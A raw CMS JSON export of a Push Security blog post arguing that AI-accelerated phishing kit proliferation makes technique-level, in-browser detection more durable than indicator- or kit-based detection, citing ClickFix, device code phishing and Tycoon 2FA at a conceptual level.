"marks":20366,"value":8776,"nodeType":883},{},[],{"data":20368,"content":20369,"nodeType":8752},{},[20370,20379],{"data":20371,"content":20372,"nodeType":8766},{},[20373],{"data":20374,"content":20375,"nodeType":879},{},[20376],{"data":20377,"marks":20378,"value":8811,"nodeType":883},{},[],{"data":20380,"content":20381,"nodeType":8766},{},[20382],{"data":20383,"content":20384,"nodeType":879},{},[20385],{"data":20386,"marks":20387,"value":8821,"nodeType":883},{},[],{"data":20389,"content":20390,"nodeType":8752},{},[20391,20400],{"data":20392,"content":20393,"nodeType":8766},{},[20394],{"data":20395,"content":20396,"nodeType":879},{},[20397],{"data":20398,"marks":20399,"value":8834,"nodeType":883},{},[],{"data":20401,"content":20402,"nodeType":8766},{},[20403],{"data":20404,"content":20405,"nodeType":879},{},[20406],{"data":20407,"marks":20408,"value":8844,"nodeType":883},{},[],{"data":20410,"content":20411,"nodeType":879},{},[20412],{"data":20413,"marks":20414,"value":21,"nodeType":883},{},[],{"items":20416},[20417,20419],{"sys":20418,"name":3273},{"id":3272},{"sys":20420,"name":343},{"id":3276},{"items":20422},[20423],{"fullName":8057,"firstName":8058,"jobTitle":8059,"profilePicture":20424},{"url":8061},{"__typename":1967,"sys":20426,"content":20428,"title":21173,"synopsis":21174,"hashTags":59,"publishedDate":21175,"slug":21176,"tagsCollection":21177,"authorsCollection":21183},{"id":20427},"5RDOpmzJolwT1hk0fNIxzf",{"json":20429},{"data":20430,"content":20431,"nodeType":875},{},[20432,20451,20457,20464,20471,20474,20482,20501,20520,20527,20533,20540,20546,20553,20561,20568,20586,20616,20622,20628,20636,20643,20661,20691,20723,20730,20735,20743,20750,20761,20768,20806,20811,20851,20888,20894,20897,20905,20912,20918,20925,20932,20938,20945,20952,20974,20977,20985,20992,21000,21007,21014,21033,21040,21046,21053,21061,21068,21085,21092,21109,21112,21120,21127,21134,21141,21144,21150,21156],{"data":20433,"content":20434,"nodeType":879},{},[20435,20439,20447],{"data":20436,"marks":20437,"value":20438,"nodeType":883},{},[],"Back in 2024, we wrote about ",{"data":20440,"content":20442,"nodeType":940},{"uri":20441},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Four-design-philosophy-detecting-what-matters\u002F",[20443],{"data":20444,"marks":20445,"value":20446,"nodeType":883},{},[],"how the Pyramid of Pain shapes Push's detection philosophy",{"data":20448,"marks":20449,"value":20450,"nodeType":883},{},[]," — detections targeting indicators that are easy for attackers to change deliver diminishing returns, while detections targeting attacker techniques impose a cost that's hard to absorb. Two years on, every force that made IoC-based detection fragile has intensified.",{"data":20452,"content":20456,"nodeType":971},{"target":20453},{"sys":20454},{"id":20455,"type":976,"linkType":977},"1iuLYxwI8T1wDUIFSom0G0",[],{"data":20458,"content":20459,"nodeType":879},{},[20460],{"data":20461,"marks":20462,"value":20463,"nodeType":883},{},[],"AI hasn't introduced a new problem so much as it's compressed the timelines on an existing one — attackers can generate infrastructure, iterate on tooling, and industrialize newly discovered techniques faster than before. The bottom layers of the Pyramid are collapsing under the weight of machine-speed operations, and the middle layers are starting to buckle too.",{"data":20465,"content":20466,"nodeType":879},{},[20467],{"data":20468,"marks":20469,"value":20470,"nodeType":883},{},[],"These changes mean that technique-level detection is more important than ever. In this article, we’ll dig into how the Pyramid is changing, and what this means for our detection philosophy at Push (TL;DR — it reinforces the path we’re already on: building detections at the top of the Pyramid by harnessing browser visibility). ",{"data":20472,"content":20473,"nodeType":905},{},[],{"data":20475,"content":20476,"nodeType":909},{},[20477],{"data":20478,"marks":20479,"value":20481,"nodeType":883},{},[20480],{"type":916},"The bottom of the Pyramid was already crumbling",{"data":20483,"content":20484,"nodeType":879},{},[20485,20489,20497],{"data":20486,"marks":20487,"value":20488,"nodeType":883},{},[],"The case against indicator-based detection didn't need AI to be compelling. ",{"data":20490,"content":20492,"nodeType":940},{"uri":20491},"https:\u002F\u002Fwww.spamhaus.org\u002F",[20493],{"data":20494,"marks":20495,"value":20496,"nodeType":883},{},[],"89% of phishing domains are active for fewer than two days",{"data":20498,"marks":20499,"value":20500,"nodeType":883},{},[],", with just 6.5% surviving past 15 days — by the time a domain makes it onto a blocklist, the campaign has moved on.",{"data":20502,"content":20503,"nodeType":879},{},[20504,20508,20516],{"data":20505,"marks":20506,"value":20507,"nodeType":883},{},[],"We've ",{"data":20509,"content":20511,"nodeType":940},{"uri":20510},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fwhy-most-phishing-attacks-feel-like-a-zero-day\u002F",[20512],{"data":20513,"marks":20514,"value":20515,"nodeType":883},{},[],"written before",{"data":20517,"marks":20518,"value":20519,"nodeType":883},{},[]," about how this makes every phishing attack effectively a zero-day for organizations relying on known-bad detection. The phishing kit's behavior — its page structure, script signatures, malicious payload mechanics — is the only detection target that outlasts a single campaign.",{"data":20521,"content":20522,"nodeType":879},{},[20523],{"data":20524,"marks":20525,"value":20526,"nodeType":883},{},[],"When we blogged about the Pyramid of Pain for modern attacks that happen predominantly over the internet, with minimal (or zero) endpoint contact, it first looked like this: ",{"data":20528,"content":20532,"nodeType":971},{"target":20529},{"sys":20530},{"id":20531,"type":976,"linkType":977},"2N04ycJ6RKGfHdX5X1TwU3",[],{"data":20534,"content":20535,"nodeType":879},{},[20536],{"data":20537,"marks":20538,"value":20539,"nodeType":883},{},[],"Now, it looks more like this:",{"data":20541,"content":20545,"nodeType":971},{"target":20542},{"sys":20543},{"id":20544,"type":976,"linkType":977},"mfhP4WToOQkrHnVkXU0tX",[],{"data":20547,"content":20548,"nodeType":879},{},[20549],{"data":20550,"marks":20551,"value":20552,"nodeType":883},{},[],"Let’s explore why. ",{"data":20554,"content":20555,"nodeType":1036},{},[20556],{"data":20557,"marks":20558,"value":20560,"nodeType":883},{},[20559],{"type":916},"AI is accelerating phishing rotation and delivery",{"data":20562,"content":20563,"nodeType":879},{},[20564],{"data":20565,"marks":20566,"value":20567,"nodeType":883},{},[],"Attackers are harnessing AI at every stage, speeding up the process of creating, rotating, and replacing phishing infrastructure at every level, as well as capitalizing on AI adoption itself to enhance their lures. The operational signature is more domains, shorter lifespans, more variation, and fewer of the reuse patterns that blocklists depend on.",{"data":20569,"content":20570,"nodeType":879},{},[20571,20575,20582],{"data":20572,"marks":20573,"value":20574,"nodeType":883},{},[],"Attackers can ",{"data":20576,"content":20577,"nodeType":940},{"uri":8638},[20578],{"data":20579,"marks":20580,"value":20581,"nodeType":883},{},[],"vibe-code entire phishing pages in minutes",{"data":20583,"marks":20584,"value":20585,"nodeType":883},{},[]," — not just cloning legitimate login pages but vibe-cloning them, feeding an AI a screenshot and having it rebuild a convincing frontend with a completely unique backend. ",{"data":20587,"content":20588,"nodeType":879},{},[20589,20593,20601,20605,20612],{"data":20590,"marks":20591,"value":20592,"nodeType":883},{},[],"We've seen attackers clone free SaaS tools like background removers and PDF converters, then inject phishing components or ClickFix payloads into what looks like a functional utility. We’ve even seen attackers distributing malware using AI-generated pages shared using ",{"data":20594,"content":20595,"nodeType":940},{"uri":1198},[20596],{"data":20597,"marks":20598,"value":20600,"nodeType":883},{},[20599],{"type":948},"LLM tool sharing functionality",{"data":20602,"marks":20603,"value":20604,"nodeType":883},{},[],", resulting in phishing delivery pages hosted on real claude.ai and chatgpt.com. And legitimate cloud platforms like ",{"data":20606,"content":20607,"nodeType":940},{"uri":2990},[20608],{"data":20609,"marks":20610,"value":20611,"nodeType":883},{},[],"Railway",{"data":20613,"marks":20614,"value":20615,"nodeType":883},{},[],", Cloudflare Workers, and Vercel host and dynamically rotate attack infrastructure, so the domains feeding into blocklists often belong to reputable services that can't simply be blocked. ",{"data":20617,"content":20621,"nodeType":971},{"target":20618},{"sys":20619},{"id":20620,"type":976,"linkType":977},"5yoLmqysyQazfzLITCUTfc",[],{"data":20623,"content":20627,"nodeType":971},{"target":20624},{"sys":20625},{"id":20626,"type":976,"linkType":977},"5XK5qZMQU19xlA8L2T5y0Z",[],{"data":20629,"content":20630,"nodeType":1036},{},[20631],{"data":20632,"marks":20633,"value":20635,"nodeType":883},{},[20634],{"type":916},"The kit ecosystem is fragmenting faster than anyone can track",{"data":20637,"content":20638,"nodeType":879},{},[20639],{"data":20640,"marks":20641,"value":20642,"nodeType":883},{},[],"What we see across our install base is a huge and growing variation in phishing kits — new kits, derivative kits of known platforms, derivatives of those derivatives — appearing on a weekly basis.",{"data":20644,"content":20645,"nodeType":879},{},[20646,20650,20657],{"data":20647,"marks":20648,"value":20649,"nodeType":883},{},[],"As we reported in our ",{"data":20651,"content":20652,"nodeType":940},{"uri":7924},[20653],{"data":20654,"marks":20655,"value":20656,"nodeType":883},{},[],"Browser Attacks Report",{"data":20658,"marks":20659,"value":20660,"nodeType":883},{},[],", the most common AiTM kits we detected over the last year were Tycoon 2FA (59% of detections), followed by Sneaky 2FA, FlowerStorm, Evilginx (nominally a red team tool, but widely abused by attackers), NakedPages, Gabagool, and dozens more — but those established names are just the visible layer.",{"data":20662,"content":20663,"nodeType":879},{},[20664,20668,20676,20680,20687],{"data":20665,"marks":20666,"value":20667,"nodeType":883},{},[],"Code is forked, modified, and redeployed across kits in a pattern that ",{"data":20669,"content":20671,"nodeType":940},{"uri":20670},"https:\u002F\u002Fblog.barracuda.com\u002F2026\u002F04\u002F16\u002Fthreat-spotlight-tycoon-2fa-scattered-everywhere",[20672],{"data":20673,"marks":20674,"value":20675,"nodeType":883},{},[],"resembles open-source development",{"data":20677,"marks":20678,"value":20679,"nodeType":883},{},[]," more than traditional criminal enterprise, and the rate at which new variants appear is accelerating. The ",{"data":20681,"content":20682,"nodeType":940},{"uri":2443},[20683],{"data":20684,"marks":20685,"value":20686,"nodeType":883},{},[],"Venom kit",{"data":20688,"marks":20689,"value":20690,"nodeType":883},{},[]," reuses Sneaky 2FA's AiTM infrastructure but carries different branding and adds device code phishing — whether it's the same developers, stolen code, or a deliberate fork is unclear.",{"data":20692,"content":20693,"nodeType":879},{},[20694,20698,20706,20710,20719],{"data":20695,"marks":20696,"value":20697,"nodeType":883},{},[],"Tycoon 2FA illustrates the scale of the evolution. The kit evolves continuously, addingnew capabilities, new evasion techniques, and hybridizing with other platforms. Even when Sekoia and Microsoft seized 330+ Tycoon domains in March 2026, the techniques it popularized were already embedded across competitors, and the slack was taken up by rival platforms within days. And in any case, Tycoon was back to ",{"data":20699,"content":20701,"nodeType":940},{"uri":20700},"https:\u002F\u002Fwww.crowdstrike.com\u002Fen-us\u002Fblog\u002Ftycoon2fa-phishing-as-a-service-platform-persists-following-takedown\u002F",[20702],{"data":20703,"marks":20704,"value":20705,"nodeType":883},{},[],"normal levels of operation",{"data":20707,"marks":20708,"value":20709,"nodeType":883},{},[]," shortly after. It has also been observed ",{"data":20711,"content":20713,"nodeType":940},{"uri":20712},"https:\u002F\u002Fwww.okta.com\u002Fen-nl\u002Fblog\u002Fthreat-intelligence\u002Ftycoon_2fa_phishing_actors_scatter\u002F",[20714],{"data":20715,"marks":20716,"value":20718,"nodeType":883},{},[20717],{"type":948},"pivoting to add new device code phishing capabilities",{"data":20720,"marks":20721,"value":20722,"nodeType":883},{},[]," (more on that below). ",{"data":20724,"content":20725,"nodeType":879},{},[20726],{"data":20727,"marks":20728,"value":20729,"nodeType":883},{},[],"Tear one down and there are many more to take its place — and meanwhile the original is already evolving into something new.",{"data":20731,"content":20734,"nodeType":971},{"target":20732},{"sys":20733},{"id":2483,"type":976,"linkType":977},[],{"data":20736,"content":20737,"nodeType":1036},{},[20738],{"data":20739,"marks":20740,"value":20742,"nodeType":883},{},[20741],{"type":916},"New techniques are being industrialized faster than ever",{"data":20744,"content":20745,"nodeType":879},{},[20746],{"data":20747,"marks":20748,"value":20749,"nodeType":883},{},[],"As well as the fragmentation of existing kits, we’re seeing new techniques added at an accelerating rate. ",{"data":20751,"content":20752,"nodeType":879},{},[20753,20757],{"data":20754,"marks":20755,"value":361,"nodeType":883},{},[20756],{"type":916},{"data":20758,"marks":20759,"value":20760,"nodeType":883},{},[]," is the clearest case study. From early nation state adoption in 2024, it took until 2026 for criminal adoption to really take off, but the take-up this year is unprecedented. The EvilTokens kit packaged device code phishing into a PhaaS offering with GPT-powered spear-phishing and adaptive landing pages, hitting 340+ organizations across five countries in March 2026. ",{"data":20762,"content":20763,"nodeType":879},{},[20764],{"data":20765,"marks":20766,"value":20767,"nodeType":883},{},[],"Now, device code functionality is now a core phish kit component. We’re tracking 18+ kits with device code phishing capabilities and a 37.5x increase in device code phishing detections this year alone, with the technique moving from state-sponsored exclusivity to something any PhaaS customer can rent.",{"data":20769,"content":20770,"nodeType":879},{},[20771,20775,20782,20786,20791,20795,20803],{"data":20772,"marks":20773,"value":20774,"nodeType":883},{},[],"Similarly, when we ",{"data":20776,"content":20777,"nodeType":940},{"uri":2953},[20778],{"data":20779,"marks":20780,"value":20781,"nodeType":883},{},[],"infiltrated Doko's Panel",{"data":20783,"marks":20784,"value":20785,"nodeType":883},{},[]," — a ",{"data":20787,"marks":20788,"value":20790,"nodeType":883},{},[20789],{"type":916},"real-time vishing and AiTM platform",{"data":20792,"marks":20793,"value":20794,"nodeType":883},{},[]," used by ShinyHunters and affiliated groups — the codebase was full of LLM-generated artifacts. Multiple groups were using the templated vishing panel and spinning up their own variants, but the AI-generated indicators persisted throughout. This approach to real-time vishing + browser payload has been a ",{"data":20796,"content":20797,"nodeType":940},{"uri":13186},[20798],{"data":20799,"marks":20800,"value":20802,"nodeType":883},{},[20801],{"type":948},"mainstay of the Com affiliates like ShinyHunters this year",{"data":20804,"marks":20805,"value":6141,"nodeType":883},{},[],{"data":20807,"content":20810,"nodeType":971},{"target":20808},{"sys":20809},{"id":2966,"type":976,"linkType":977},[],{"data":20812,"content":20813,"nodeType":879},{},[20814,20818,20822,20826,20835,20839,20847],{"data":20815,"marks":20816,"value":20817,"nodeType":883},{},[],"The broader ",{"data":20819,"marks":20820,"value":316,"nodeType":883},{},[20821],{"type":916},{"data":20823,"marks":20824,"value":20825,"nodeType":883},{},[]," family shows the same acceleration: First reported in early 2024 and adopted by four nation-state groups within a single quarter. Fast forward and ",{"data":20827,"content":20829,"nodeType":940},{"uri":20828},"https:\u002F\u002Fwww.crowdstrike.com\u002Fen-us\u002Fglobal-threat-report\u002F",[20830],{"data":20831,"marks":20832,"value":20834,"nodeType":883},{},[20833],{"type":948},"CrowdStrike's data",{"data":20836,"marks":20837,"value":20838,"nodeType":883},{},[]," shows a 563% increase in fake CAPTCHA incidents (one of the more common ClickFix lure types), while ",{"data":20840,"content":20841,"nodeType":940},{"uri":1144},[20842],{"data":20843,"marks":20844,"value":20846,"nodeType":883},{},[20845],{"type":948},"Microsoft reported",{"data":20848,"marks":20849,"value":20850,"nodeType":883},{},[]," it as making up 47% of observed attacks according to their Digital Defense Report.",{"data":20852,"content":20853,"nodeType":879},{},[20854,20858,20862,20866,20873,20877,20884],{"data":20855,"marks":20856,"value":20857,"nodeType":883},{},[],"And ",{"data":20859,"marks":20860,"value":1321,"nodeType":883},{},[20861],{"type":916},{"data":20863,"marks":20864,"value":20865,"nodeType":883},{},[]," — a combination of ClickFix and OAuth consent phishing techniques — suggests the next compression is already underway. Push researchers ",{"data":20867,"content":20868,"nodeType":940},{"uri":1331},[20869],{"data":20870,"marks":20871,"value":20872,"nodeType":883},{},[],"discovered the technique",{"data":20874,"marks":20875,"value":20876,"nodeType":883},{},[]," in December 2025 — a browser-native ClickFix variant hijacking OAuth consent grants via Azure CLI's localhost redirect. It was later confirmed to be tied to APT29. By January 2026, a ",{"data":20878,"content":20879,"nodeType":940},{"uri":1343},[20880],{"data":20881,"marks":20882,"value":20883,"nodeType":883},{},[],"criminal ConsentFix v3 toolkit",{"data":20885,"marks":20886,"value":20887,"nodeType":883},{},[]," had appeared on the XSS forum with Cloudflare Workers, ZoomInfo targeting, and automated exfiltration via Pipedream.",{"data":20889,"content":20893,"nodeType":971},{"target":20890},{"sys":20891},{"id":20892,"type":976,"linkType":977},"41FMif4T0y1maflzonWgL8",[],{"data":20895,"content":20896,"nodeType":905},{},[],{"data":20898,"content":20899,"nodeType":909},{},[20900],{"data":20901,"marks":20902,"value":20904,"nodeType":883},{},[20903],{"type":916},"Why technique-level detection is the only layer that holds",{"data":20906,"content":20907,"nodeType":879},{},[20908],{"data":20909,"marks":20910,"value":20911,"nodeType":883},{},[],"The middle of the Pyramid — tool signatures and artifacts — used to offer much more durable detection than infrastructure indicators. Fingerprinting a specific phishing kit by its JavaScript structure or HTML patterns provided a detection target that survived across dozens or hundreds of campaigns, even as the underlying domains rotated. Tool level detections are still better, but not by quite the same margin.",{"data":20913,"content":20917,"nodeType":971},{"target":20914},{"sys":20915},{"id":20916,"type":976,"linkType":977},"5pxaYdCIFiFKLPhRaPoldX",[],{"data":20919,"content":20920,"nodeType":879},{},[20921],{"data":20922,"marks":20923,"value":20924,"nodeType":883},{},[],"When the kit landscape was dominated by a handful of platforms, you could write signatures for Tycoon, Sneaky2FA, EvilProxy, and so on, and cover the lion's share of attacks. With the ecosystem now producing new variants and entirely new kits on a weekly basis, detecting by kit fingerprint starts to look uncomfortably similar to detecting by domain.",{"data":20926,"content":20927,"nodeType":879},{},[20928],{"data":20929,"marks":20930,"value":20931,"nodeType":883},{},[],"But many of these proliferating kits do share behavioral patterns at a deeper level than their code signatures. For example, every device code phishing kit implements fundamentally the same flow: present a lure, generate a device code via the OAuth Device Authorization endpoint, get the user to enter it on the legitimate authorization page, and poll for the resulting tokens. The frontends vary, the infrastructure varies, but the behavioral pattern doesn't.",{"data":20933,"content":20937,"nodeType":971},{"target":20934},{"sys":20935},{"id":20936,"type":976,"linkType":977},"FyyHayQtsJTwoB1kluMOl",[],{"data":20939,"content":20940,"nodeType":879},{},[20941],{"data":20942,"marks":20943,"value":20944,"nodeType":883},{},[],"Genuinely new attack techniques still require human creativity — an attacker has to identify a gap in how a legitimate protocol or feature can be subverted. That kind of innovation hasn't been automated. But the window to discover a technique, build a detection, and then deploy it before it is adopted by criminals at scale is compressing with each generation.",{"data":20946,"content":20947,"nodeType":879},{},[20948],{"data":20949,"marks":20950,"value":20951,"nodeType":883},{},[],"Organizations that detect at the technique level and deploy before commoditization have a structural advantage that increases over time. Waiting for indicators — even tool-level indicators — means chasing a curve that's accelerating away from you. This is the challenge we grapple with every day as we strive for the most resilient detections possible. ",{"data":20953,"content":20954,"nodeType":4197},{},[20955],{"data":20956,"content":20957,"nodeType":879},{},[20958,20961,20967,20970],{"data":20959,"marks":20960,"value":19564,"nodeType":883},{},[],{"data":20962,"content":20963,"nodeType":940},{"uri":19567},[20964],{"data":20965,"marks":20966,"value":19572,"nodeType":883},{},[],{"data":20968,"marks":20969,"value":19576,"nodeType":883},{},[],{"data":20971,"marks":20972,"value":19581,"nodeType":883},{},[20973],{"type":891},{"data":20975,"content":20976,"nodeType":905},{},[],{"data":20978,"content":20979,"nodeType":909},{},[20980],{"data":20981,"marks":20982,"value":20984,"nodeType":883},{},[20983],{"type":916},"What it takes to detect at the top of the Pyramid",{"data":20986,"content":20987,"nodeType":879},{},[20988],{"data":20989,"marks":20990,"value":20991,"nodeType":883},{},[],"If technique-level detection is the only layer that holds, two things have to be true about your detection capability: You need the right vantage point, and you need the research velocity to stay ahead.",{"data":20993,"content":20994,"nodeType":1036},{},[20995],{"data":20996,"marks":20997,"value":20999,"nodeType":883},{},[20998],{"type":916},"You need the right vantage point",{"data":21001,"content":21002,"nodeType":879},{},[21003],{"data":21004,"marks":21005,"value":21006,"nodeType":883},{},[],"Technique-level behaviors in browser-based identity attacks — how a phishing page orchestrates credential entry, how a device code flow presents its authorization prompt, how a ClickFix variant manipulates the clipboard — are visible in the browser session and nowhere else.",{"data":21008,"content":21009,"nodeType":879},{},[21010],{"data":21011,"marks":21012,"value":21013,"nodeType":883},{},[],"Network proxies see encrypted traffic and can attempt to reconstruct page behavior from metadata, but DOM manipulation, user interaction sequences, and script execution aren't visible from that vantage point. Email gateways see the delivery mechanism (or nothing at all in the increasing number of social media and search engine based attacks) but not the payload.",{"data":21015,"content":21016,"nodeType":879},{},[21017,21021,21029],{"data":21018,"marks":21019,"value":21020,"nodeType":883},{},[],"As we disclosed in our ",{"data":21022,"content":21023,"nodeType":940},{"uri":7924},[21024],{"data":21025,"marks":21026,"value":21028,"nodeType":883},{},[21027],{"type":948},"browser attacks report",{"data":21030,"marks":21031,"value":21032,"nodeType":883},{},[],", 95% of in-browser attacks we detect use some form of bot protection, often combined with conditional loading techniques like referrer and browser checks, reliably defeating automated analysis techniques. ",{"data":21034,"content":21035,"nodeType":879},{},[21036],{"data":21037,"marks":21038,"value":21039,"nodeType":883},{},[],"Behavioral detection at the technique level requires observing what happens on the page at the moment the user interacts with it — analyzing pages, not links. When you see the entire browsing flow — ad click, redirect chain, page render, credential prompt — an attack stands out immediately. Without that context, any detection system is forced to fill in gaps, and the gaps are where attacks hide.",{"data":21041,"content":21045,"nodeType":971},{"target":21042},{"sys":21043},{"id":21044,"type":976,"linkType":977},"4804g6u4POUDpL42bzP0EY",[],{"data":21047,"content":21048,"nodeType":879},{},[21049],{"data":21050,"marks":21051,"value":21052,"nodeType":883},{},[],"Push sits inside the browser session, observing this in real time. Its detections target the behavioral mechanics of techniques rather than the surface characteristics of individual kits or infrastructure.",{"data":21054,"content":21055,"nodeType":1036},{},[21056],{"data":21057,"marks":21058,"value":21060,"nodeType":883},{},[21059],{"type":916},"You need the research expertise",{"data":21062,"content":21063,"nodeType":879},{},[21064],{"data":21065,"marks":21066,"value":21067,"nodeType":883},{},[],"When the window between technique discovery and industrialized exploitation is measured in weeks rather than years, the detection pipeline needs to operate on that same compressed timescale.",{"data":21069,"content":21070,"nodeType":879},{},[21071,21075,21081],{"data":21072,"marks":21073,"value":21074,"nodeType":883},{},[],"This is where our ",{"data":21076,"content":21077,"nodeType":940},{"uri":8638},[21078],{"data":21079,"marks":21080,"value":8643,"nodeType":883},{},[],{"data":21082,"marks":21083,"value":21084,"nodeType":883},{},[]," fits. It's tripled our monthly detection output — not by generating bigger blocklists, but by scaling the process of discovering behavioral patterns across the telemetry generated by 3+ million browser deployments.",{"data":21086,"content":21087,"nodeType":879},{},[21088],{"data":21089,"marks":21090,"value":21091,"nodeType":883},{},[],"The detections it produces are technique-class by design, targeting how attacks work rather than the infrastructure or specific tool that implements them. The goal is curation, not accumulation — hundreds of high-fidelity behavioral detections rather than the billions of signatures and domain entries that traditional approaches require.",{"data":21093,"content":21094,"nodeType":879},{},[21095,21099,21105],{"data":21096,"marks":21097,"value":21098,"nodeType":883},{},[],"When we detected the first in-the-wild ",{"data":21100,"content":21101,"nodeType":940},{"uri":7409},[21102],{"data":21103,"marks":21104,"value":18168,"nodeType":883},{},[],{"data":21106,"marks":21107,"value":21108,"nodeType":883},{},[]," through the pipeline — a user had searched for NotebookLM, clicked a paid Google ad, and was redirected to a fake page with a WebAssembly C2 connector — the detection shipped to all customers within minutes. It didn't depend on knowing the domain, the ad creative, or the specific kit. It depended on recognizing the technique itself.",{"data":21110,"content":21111,"nodeType":905},{},[],{"data":21113,"content":21114,"nodeType":909},{},[21115],{"data":21116,"marks":21117,"value":21119,"nodeType":883},{},[21118],{"type":916},"Technique-level detection is now the only option",{"data":21121,"content":21122,"nodeType":879},{},[21123],{"data":21124,"marks":21125,"value":21126,"nodeType":883},{},[],"As a framework for detection durability, the Pyramid of Pain is more relevant than ever. ",{"data":21128,"content":21129,"nodeType":879},{},[21130],{"data":21131,"marks":21132,"value":21133,"nodeType":883},{},[],"AI has made infrastructure indicators essentially disposable. The tools tier is compressing as criminal vendors vibe-code, fork, and clone tooling at machine speed. Technique-level detection is the layer that holds long-term to be able to proactively detect and block net-new attacks and the kits that power them. ",{"data":21135,"content":21136,"nodeType":879},{},[21137],{"data":21138,"marks":21139,"value":21140,"nodeType":883},{},[],"Novel attack techniques still require human creativity to discover, and detections built around how those techniques work can survive infrastructure rotation, tool proliferation, and kit fragmentation. Defending that layer requires a vantage point inside the browser session and a research pipeline fast enough to stay ahead of the accelerating path from discovery to industrialization.",{"data":21142,"content":21143,"nodeType":905},{},[],{"data":21145,"content":21146,"nodeType":879},{},[21147],{"data":21148,"marks":21149,"value":1729,"nodeType":883},{},[],{"data":21151,"content":21152,"nodeType":879},{},[21153],{"data":21154,"marks":21155,"value":1736,"nodeType":883},{},[],{"data":21157,"content":21158,"nodeType":879},{},[21159,21162,21170],{"data":21160,"marks":21161,"value":21,"nodeType":883},{},[],{"data":21163,"content":21164,"nodeType":940},{"uri":4772},[21165],{"data":21166,"marks":21167,"value":21169,"nodeType":883},{},[21168],{"type":948},"Book a live demo",{"data":21171,"marks":21172,"value":6683,"nodeType":883},{},[],"The Pyramid of Pain in the AI era: Why technique-level detection matters more than ever","AI is accelerating the collapse of indicator-based threat detection. Here's why you need technique-level detection to stay ahead.","2026-06-01T00:00:00.000Z","the-pyramid-of-pain-in-the-ai-era",{"items":21178},[21179,21181],{"sys":21180,"name":343},{"id":3276},{"sys":21182,"name":3273},{"id":3272},{"items":21184},[21185],{"fullName":866,"firstName":867,"jobTitle":868,"profilePicture":21186},{"url":872},"can-ai-replace-a-threat-researcher-what-we-learned-building-an-agentic-threat-hunting-pipeline","blog\u002Fcan-ai-replace-a-threat-researcher-what-we-learned-building-an-agentic-threat-hunting-pipeline",{"json":21190},{"data":21191,"content":21192,"nodeType":875},{},[21193],{"data":21194,"content":21195,"nodeType":879},{},[21196],{"data":21197,"marks":21198,"value":21199,"nodeType":883},{},[],"What does agentic threat hunting against modern browser-based attacks actually look like? At Push, we built an end-to-end threat hunting and detection engineering capability that uses AI agents as a force multiplier, tripling the number of new detections we’re shipping each month. Here’s how it works.","How we built an end-to-end threat hunting and detection engineering capability at Push that uses AI agents as a force multiplier.",{"id":21202,"publishedAt":21203},"1jfqiWQlL6qkn3i9yjNbFB","2026-08-12T11:52:54.643Z",{"items":21205},[21206,21208],{"sys":21207,"name":3273},{"id":3272},{"sys":21209,"name":343},{"id":3276},{"items":21211},[21212,21214,21216,21218,21220,21222,21224,21226,21228,21230,21232,21234,21236,21238,21240,21242,21244],{"sys":21213,"name":298,"slug":299,"tier":31},{"id":295},{"sys":21215,"name":235,"slug":236,"tier":31},{"id":232},{"sys":21217,"name":343,"slug":344,"tier":31},{"id":340},{"sys":21219,"name":280,"slug":281,"tier":31},{"id":277},{"sys":21221,"name":521,"slug":522,"tier":31},{"id":518},{"sys":21223,"name":352,"slug":353,"tier":45},{"id":349},{"sys":21225,"name":316,"slug":317,"tier":45},{"id":313},{"sys":21227,"name":442,"slug":443,"tier":45},{"id":439},{"sys":21229,"name":244,"slug":245,"tier":45},{"id":241},{"sys":21231,"name":262,"slug":263,"tier":45},{"id":259},{"sys":21233,"name":512,"slug":513,"tier":45},{"id":509},{"sys":21235,"name":361,"slug":362,"tier":45},{"id":358},{"sys":21237,"name":486,"slug":487,"tier":45},{"id":483},{"sys":21239,"name":450,"slug":451,"tier":45},{"id":447},{"sys":21241,"name":564,"slug":565,"tier":45},{"id":561},{"sys":21243,"name":325,"slug":326,"tier":45},{"id":322},{"sys":21245,"name":573,"slug":574,"tier":45},{"id":570},"EIw901ieTSJKgYUJtBGNL0gxQIxXjCkEBakCEa5VEHA",{"id":21248,"title":7965,"authorsCollection":21249,"content":21254,"extension":228,"faqItemsCollection":21988,"faqTitle":59,"featured":19,"hashTags":59,"meta":21990,"metaTitle":21991,"ogImage":59,"postType":1962,"publishedDate":7967,"relatedBlogPostsCollection":21992,"slug":7968,"stem":25303,"subtitle":59,"summary":25304,"synopsis":7966,"sys":25315,"tagsCollection":25317,"topicsCollection":25323,"__hash__":25357},"blog\u002Fblog\u002Fintroducing-the-browser-and-identity-attacks-matrix.json",{"items":21250},[21251],{"fullName":866,"firstName":867,"jobTitle":868,"socialLinks":21252,"profilePicture":21253},[870],{"url":872},{"json":21255,"links":21963},{"data":21256,"content":21257,"nodeType":875},{},[21258,21273,21288,21303,21308,21311,21318,21324,21330,21336,21342,21349,21352,21359,21365,21371,21377,21382,21389,21404,21410,21416,21429,21436,21460,21473,21479,21503,21510,21534,21540,21547,21562,21568,21574,21579,21585,21592,21607,21613,21629,21635,21638,21645,21651,21726,21732,21745,21748,21773,21788,21794,21800,21803,21810,21825,21831,21837,21852,21855,21862,21868,21898,21904,21919,21934,21939,21942,21948],{"data":21259,"content":21260,"nodeType":879},{},[21261,21264,21270],{"data":21262,"marks":21263,"value":7141,"nodeType":883},{},[],{"data":21265,"content":21266,"nodeType":940},{"uri":7144},[21267],{"data":21268,"marks":21269,"value":7149,"nodeType":883},{},[],{"data":21271,"marks":21272,"value":7153,"nodeType":883},{},[],{"data":21274,"content":21275,"nodeType":879},{},[21276,21279,21285],{"data":21277,"marks":21278,"value":7160,"nodeType":883},{},[],{"data":21280,"content":21281,"nodeType":940},{"uri":7163},[21282],{"data":21283,"marks":21284,"value":7168,"nodeType":883},{},[],{"data":21286,"marks":21287,"value":7172,"nodeType":883},{},[],{"data":21289,"content":21290,"nodeType":879},{},[21291,21294,21300],{"data":21292,"marks":21293,"value":7179,"nodeType":883},{},[],{"data":21295,"content":21296,"nodeType":940},{"uri":7182},[21297],{"data":21298,"marks":21299,"value":7187,"nodeType":883},{},[],{"data":21301,"marks":21302,"value":7191,"nodeType":883},{},[],{"data":21304,"content":21307,"nodeType":971},{"target":21305},{"sys":21306},{"id":7196,"type":976,"linkType":977},[],{"data":21309,"content":21310,"nodeType":905},{},[],{"data":21312,"content":21313,"nodeType":909},{},[21314],{"data":21315,"marks":21316,"value":7208,"nodeType":883},{},[21317],{"type":916},{"data":21319,"content":21320,"nodeType":879},{},[21321],{"data":21322,"marks":21323,"value":7215,"nodeType":883},{},[],{"data":21325,"content":21326,"nodeType":879},{},[21327],{"data":21328,"marks":21329,"value":7222,"node